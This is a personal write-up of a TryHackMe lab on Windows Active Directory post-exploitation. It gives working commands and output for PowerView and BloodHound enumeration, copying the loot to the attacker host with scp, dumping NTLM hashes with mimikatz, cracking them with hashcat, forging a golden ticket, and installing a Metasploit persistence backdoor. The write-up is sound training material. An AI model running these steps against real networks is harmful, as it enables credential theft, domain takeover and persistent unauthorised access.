Post exploitation basics

Just ssh with:

Your machine IP is 10.10.148.206 (yours will differ) Username: Administrator Password: P@$$W0rd Domain Name: CONTROLLER

we run powershell powershell -ep bypass

PowerView

then powerview . .\Downloads\PowerView.ps1 domain users enumeration Get-NetUser | select cn

cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{FLAG1_HERE}
sshd

groups enum Get-NetGroup -GroupName *admin*

Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins

further commands cheatsheet here

PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share

PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem

operatingsystem
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

Bloodhound

Install bloodhond and neo4j with apt

In powershell use . .\Downloads\SharpHound.ps1

Loot

PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
------------------------------------------------
Initializing SharpHound at 2:27 PM on 11/19/2021
------------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
PS C:\Users\Administrator> [+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 95 MB RAM
Status: 66 objects finished (+66 8)/s -- Using 99 MB RAM
Enumeration finished in 00:00:00.7080884
Compressing data to C:\Users\Administrator\20211119142703_loot.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 2:27 PM on 11/19/2021! Happy Graphing!

first enable ssh temporally sudo sytemctl start ssh.socket then on remote machine get your loot

scp .\20211119152332_loot.zip nair0lf32@10.8.226.203:/home/nair0lf32/loot.zip

start neo4j sudo neo4j console or sudo neo4j start then bloodhound

after login deploy hamurger menu and ‘analysis’

Mimikatz

Exit powershell with exit Go where it is and run mimikatz cd Downloads && mimikatz.exe privilege::debug Should be Privilege '20' OK

Then we dump hashes

lsadump::lsa /patch

Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 9f39a3b67c58269c707986cdaa1bb782

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a

then we rack them hashcat -m 1000 <hash> rockyou.txt

Mimikatz Golden Ticket

Dump hash of kerberos admin we identified earlier

lsadump::lsa /inject /name:krbtgt

Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f6 (502)
User : krbtgt

* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
LM   :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

* WDigest
01  49a8de3b6c7ae1ddf36aa868e68cd9ea
02  7902703149b131c57e5253fd9ea710d0
03  71288a6388fb28088a434d3705cc6f2a
04  49a8de3b6c7ae1ddf36aa868e68cd9ea
05  7902703149b131c57e5253fd9ea710d0
06  df5ad3cc1ff643663d85dabc81432a81
07  49a8de3b6c7ae1ddf36aa868e68cd9ea
08  a489809bd0f8e525f450fac01ea2054b
09  19e54fd00868c3b0b35b5e0926934c99
10  4462ea84c5537142029ea1b354cd25fa
11  6773fcbf03fd29e51720f2c5087cb81c
12  19e54fd00868c3b0b35b5e0926934c99
13  52902abbeec1f1d3b46a7bd5adab3b57
14  6773fcbf03fd29e51720f2c5087cb81c
15  8f2593c344922717d05d537487a1336d
16  49c009813995b032cc1f1a181eaadee4
17  8552f561e937ad7c13a0dca4e9b0b25a
18  cc18f1d9a1f4d28b58a063f69fa54f27
19  12ae8a0629634a31aa63d6f422a14953
20  b6392b0471c53dd2379dcc570816ba10
21  7ab113cb39aa4be369710f6926b68094
22  7ab113cb39aa4be369710f6926b68094
23  e38f8bc728b21b85602231dba189c5be
24  4700657dde6382cd7b990fb042b00f9e
25  8f46d9db219cbd64fb61ba4fdb1c9ba7
26  36b6a21f031bf361ce38d4d8ad39ee0f
27  e69385ee50f9d3e105f50c61c53e718e
28  ca006400aefe845da46b137b5b50f371
29  15a607251e3a2973a843e09c008c32e3

* Kerberos
Default Salt : CONTROLLER.LOCALkrbtgt
Credentials
des_cbc_md5       : 64ef5d43922f3b5d

* Kerberos-Newer-Keys
Default Salt : CONTROLLER.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
des_cbc_md5       (4096) : 64ef5d43922f3b5d

* NTLM-Strong-NTOWF
Random Value : 666caaaaf30081f30211bd7fa445fec4

from those we can create a golden Ticket

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

in this case it would give

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 11/19/2021 4:08:13 PM ; 11/17/2031 4:08:13 PM ; 11/17/2031 4:08:13 PM
-> Ticket : ticket.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

To use our ticket we run in mimikatz misc::cmd Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7D8DA43B8 This will open a new command prompt with elevated privileges to all machines (amazing) exit and try stuff like dir \\Desktop-1\c$ or PsExec.exe \\Desktop-1 cmd.exe normally you get those commands executed but tryhackme doesnt allow networking here

The network path was not found.

Server Manager

RDP to the machine xfreerdp /u:CONTROLLER\Administrator /p:P@$$W0rd /v:10.10.2.124

If any issue with xfreerdp login remove /p: and copy Password manually after prompt Navigate to the tools tab and select the Active Directory Users and Computers user accounts may set the service accounts passwords inside of the description

Backdoors

After access with metasploit there is a module for persistent Backdoors

exploit/windows/local/persistence

Here you can see the session die however the second we run the handler again we get a meterpreter shell back thanks to the persistence service

There are other ways of maintaining access such as adding users and rootkits however I will leave you to do your own research and labs on those topics